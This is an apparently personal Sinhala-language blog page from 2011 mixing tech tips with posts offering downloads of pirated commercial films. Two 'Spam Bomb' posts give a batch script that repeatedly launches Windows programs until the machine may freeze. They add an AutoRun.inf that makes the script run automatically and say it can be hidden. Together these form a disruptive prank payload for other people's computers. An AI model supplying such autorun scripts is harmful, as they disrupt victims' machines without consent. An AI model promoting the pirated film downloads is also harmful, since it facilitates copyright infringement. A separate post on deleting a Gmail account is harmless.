Spam Bomb : Part 2

Autorun Spam Bomb

G-Mail Account Delete කරමු..

Let's delete Gmail Account

Harry Potter and the Deathly Hallows: Part 1

Download Harry Potter and the Deathly Hallows: Part 1 (2010) BRRip 650mb

Death Race 2

රේස් එකේ ඉන්න අනිත් අයව මරාගෙන තමයි මේක දිනන්නෙ. ඒකයි මේකට 'Death Race' කියන්නෙ.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Monday, May 30, 2011

Spam Bomb : Part 2

       කලින් කිව්ව spam bomb එක autorun වෙන්න හදන හැටි තමා දැන් කියන්නෙ.
මුලින් ම notepad එක open කරල,

[AutoRun]
OPEN=NAME.BAT

       ඉහත තියෙන name කියන එකට ඕගොල්ලො .bat file එක save කරපු නම දාන්න. ඊට පස්සෙ කලින් save කරපු spam bomb එක තියෙන තැනට AutoRun.inf නමින් save කරන්න.
       කැමති නම් මේක hide කරන්නත් පුළුවන්.............

Friday, May 27, 2011

Battle: Los Angeles (2011) BRRip 650mb


Movie Info:

[FORMAT]:…………………..[ Matroska
[AWARDS]:…………………..[ none
[GENRE]:……………………[ Action | Sci-Fi | Thriller
[FILE SIZE]:………………..[ 650 MiB
[NO OF CDs]:………………..[ 1
[RESOLUTION]:……………….[ 1280*536
[ASPECT RATIO]:……………..[ 2.35:1
[FRAME RATE]:……………….[ 23.976 fps
[LANGUAGE ]:………………..[ English
[SUBTITLES]:………………..[ none
[ORIGINAL RUNTIME]:………….[ 01:56:00
[RELEASE RUNTIME]:…………..[ 01:56:00
[SOURCE]:…………………..[ 720pBR
[ENCODER]:………………….[scOrp
[iMDB RATING]:………………[6.0

Download Link: 

Thursday, May 26, 2011

G-Mail Account Delete කරමු..

Gmail Account delete කරන එක හරිම ලේසියි. එහෙනම් බලා ගන්නකෝ.
මුලින් ම account එකට log වෙලා, account setting යන්න. ඊට පස්සෙ පහළ කියල තියන විදියට කරන්න.
 අන්තිමේ දි මේ  හැම එකකට ම හරි දාල email එකේ password එක type කරන්න.ඊට පස්සෙ තියෙන වාක්‍ය දෙකටත් හරි දාල delete google account, click කරන්න. දැන් වැඩේ හරි....කොහොම ද වැඩේ comment පාරක් දාන්නකෝ..............

Wednesday, May 25, 2011

The Green Hornet (2011) BRRip 700mb


Movie Info:

[TITLE]…………………….[ The Green Hornet
[DIRECTOR]………………….[ Michel Gondry
[RELEASE DATE]………………[ 14 January 2011 (USA)
[FORMAT]:…………………..[ Matroska (MKV)
[GENRE]:……………………[ Action | Comedy | Crime
[NO OF CDs]…………………[ 1
[FILE SIZE]:………………..[ 700MB
[RESOLUTION]:……………….[ 1280x528
[LANGUAGE ]:………………..[ English
[SUBTITLES]:………………..[ English [Softcoded] – muxed
[ORIGINAL RUNTIME]:………….[ 01:58:53
[RELEASE RUNTIME]:…………..[ 01:58:53
[ENCODER]:………………….[ ShAaNiG
[SOURCE]:…………………..[ The Green Hornet 2011 720p BluRay x264-TheGreenHornet
[iMDB RATING]:………………[ 6.3/10

Tuesday, May 24, 2011

පුංචි පහේ Spam Bomb එකක් හදමු...



මේකෙ කරන්න තියෙන්නෙ හරිම ලේසි වැඩක්. එහෙනම් කරල බලමුකෝ...

මුලින් ම පහළ තියෙන එක Notepad එක‍ට copy, paste කරන්න.

@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer

ඊට පස්සෙ මේක .bat File එකක් විදියට Save කරන්න. මේක වැරදිලා හරි double click කරල run වුණොත් computer එකේ තියෙන internet explore වැනි මෙහි සදහන් වෙලා තියෙන ඒව run වෙනව.

මෙහි Start යනුවෙන් තියන ඒවා වැඩි වාර ගණනක් copy කරන එක හොදයි.
උදා:
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer

මේක run වුණා කියල computer එකට හානියක් වෙන්නෙ නෑ. හැබැයි මේකෙ Start වලින් තියෙන ඒව හුගක් copy කරල තිබුණොත් Computer එක Stuck වෙන්න පුළුවන්. ඔයාල මේක test කරල බලන්නකෝ Start ඒව copy කරන්නෙ නැතිව....

Harry Potter and the Deathly Hallows: Part 1 (2010) BRRip 650mb



Media Info:

Complete Name……………: Harry Potter and the Deathly Hallows: Part 1
Format………………….: Matroska
File size……………….: 647 MiB
Duration………………..: 2h 26mn
Overall bit rate…………: 619 Kbps
Resolution………………: 1280 x 536 pixels
Frame rate………………: 23.976 fps
Audio…………………..: AAC 48000KHz
Audio Language…………..: English
Source………………….: Harry Potter And The Deathly Hallows Part 1 (2010) 720p BluRay x264-TWiZTED
Encoder…………………: ARNT
[iMDB RATING]:…………..: 7.8/10

IMDB Rank: Harry Potter And The Deathly Hallows: Part 1

මේ ෆිල්ම් එක ටොරන්ට් ඩවුන්ලෝඩ් කරන්න ඕන නෑ. ඩිරෙක් Downlaod කරන්න පුළුවන්....පහළ තියෙන link 4ම Download කරගන්න. එයින් එකක 165MB විතර තියෙනව.